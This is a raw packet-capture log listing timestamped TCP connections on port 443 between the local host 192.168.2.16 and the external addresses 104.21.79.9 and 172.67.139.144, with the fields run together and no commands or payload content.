                                                                                                                                                                                    Jan 26, 2024 14:42:16.183995008 CET49818443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:16.184608936 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.184678078 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.184684038 CET49818443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:16.184688091 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.184732914 CET49818443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:16.185482979 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.185518026 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.185569048 CET49818443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:16.185569048 CET49818443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:16.185576916 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.188158035 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.188180923 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.188302040 CET49818443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:16.188308954 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.190521002 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.190541983 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.190834045 CET49818443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:16.190841913 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.192212105 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.192229986 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.192298889 CET49818443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:16.192306042 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.192383051 CET49818443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:16.194680929 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.194705009 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.194782019 CET49818443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:16.194788933 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.196379900 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.196400881 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.196465015 CET49818443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:16.196470976 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.196508884 CET49818443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:16.197187901 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.197264910 CET49818443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:16.197268963 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.197300911 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.197344065 CET49818443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:16.197344065 CET49818443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:16.198580980 CET49818443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:16.198594093 CET44349818104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.283924103 CET44349819172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.283978939 CET44349819172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.284109116 CET44349819172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.295243025 CET49819443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:16.338423967 CET49819443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:16.338448048 CET44349819172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.367561102 CET44349820172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.367904902 CET44349820172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.367976904 CET49820443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:16.368522882 CET49820443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:16.368540049 CET44349820172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.382627964 CET44349821172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.382694960 CET44349821172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.382740021 CET44349821172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.382786036 CET44349821172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.382824898 CET44349821172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.382855892 CET49821443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:16.382882118 CET44349821172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.382915020 CET49821443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:16.382922888 CET49821443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:16.382926941 CET44349821172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.383008957 CET44349821172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:16.383059978 CET49821443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:16.383990049 CET49821443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:16.384004116 CET44349821172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:21.462702036 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:21.462755919 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:21.462869883 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:21.463116884 CET49826443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:21.463182926 CET44349826104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:21.463247061 CET49826443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:21.465893030 CET49826443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:21.465915918 CET44349826104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:21.466167927 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:21.466181993 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:21.764190912 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:21.764439106 CET44349826104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:21.764718056 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:21.764731884 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:21.764741898 CET49826443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:21.764761925 CET44349826104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:21.765248060 CET44349826104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:21.765388966 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:21.765667915 CET49826443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:21.765765905 CET44349826104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:21.766052961 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:21.766158104 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:21.766232014 CET49826443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:21.808105946 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:21.809933901 CET44349826104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.225409031 CET44349826104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.225502014 CET44349826104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.225585938 CET49826443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.226171970 CET49826443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.226191044 CET44349826104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.258594990 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.305897951 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.606898069 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.606949091 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.606985092 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.607019901 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.607032061 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.607053995 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.607099056 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.607125998 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.607136965 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.607259989 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.607503891 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.607543945 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.607568026 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.607575893 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.607614040 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.607650042 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.607769012 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.607769012 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.607778072 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.608333111 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.608371973 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.608407021 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.608444929 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.608453035 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.608503103 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.609219074 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.609256983 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.609297991 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.609299898 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.609313965 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.609407902 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.609424114 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.609487057 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.609982014 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.610038042 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.610076904 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.610095978 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.610104084 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.610146999 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.610157013 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.610842943 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.610889912 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.610893011 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.610902071 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.610944033 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.610950947 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.611682892 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.611731052 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.611738920 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.611776114 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.611813068 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.611818075 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.611830950 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.611872911 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.612530947 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.612592936 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.612629890 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.612637043 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.612652063 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.612694025 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.613255978 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.613388062 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.613446951 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.613455057 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.663279057 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.725172043 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.725186110 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.725235939 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.725814104 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.725867987 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.725930929 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.725991011 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.726119995 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.726181030 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.726736069 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.726799011 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.727080107 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.727138042 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.727241993 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.727303982 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.728384018 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.728437901 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.728780985 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.728832006 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.729342937 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.729403019 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.729415894 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.729468107 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.730217934 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.730276108 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.731534958 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.731585979 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.731586933 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.731600046 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.731642962 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.731961966 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.732037067 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.732784986 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.732839108 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.732845068 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.732886076 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.733683109 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.733735085 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.843641996 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.843700886 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.843847990 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.843868017 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.843930960 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.844419003 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.844480038 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.844505072 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.844511032 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.844568014 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.844923019 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.845004082 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.845808983 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.845868111 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.845900059 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.845906973 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.845949888 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.846724987 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.846800089 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.846811056 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.846894026 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.847507954 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.847590923 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.847614050 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.847620010 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.847704887 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.848301888 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.848387003 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.849170923 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.849230051 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.849256992 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.849262953 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.849318027 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.849915028 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.849972010 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.850728989 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.850797892 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.850802898 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.850810051 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.850852966 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.851602077 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.851671934 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.851692915 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.851748943 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.852472067 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.852528095 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.853310108 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.853368998 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.853378057 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.853439093 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.855804920 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.855813980 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.855843067 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.855890989 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.855901003 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.855916023 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.855951071 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.856563091 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.856630087 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.858349085 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.858380079 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.858419895 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.858428955 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.858450890 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.858469963 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.860796928 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.860816002 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.860860109 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.860867977 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.860898018 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.860915899 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.862518072 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.862538099 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.862581015 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.862591982 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.862637997 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.862637997 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.863311052 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.863375902 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.863388062 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.863447905 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.863493919 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.864198923 CET49825443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.864217043 CET44349825104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.923578024 CET49829443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:22.923624992 CET44349829104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.923712015 CET49829443192.168.2.16104.21.79.9
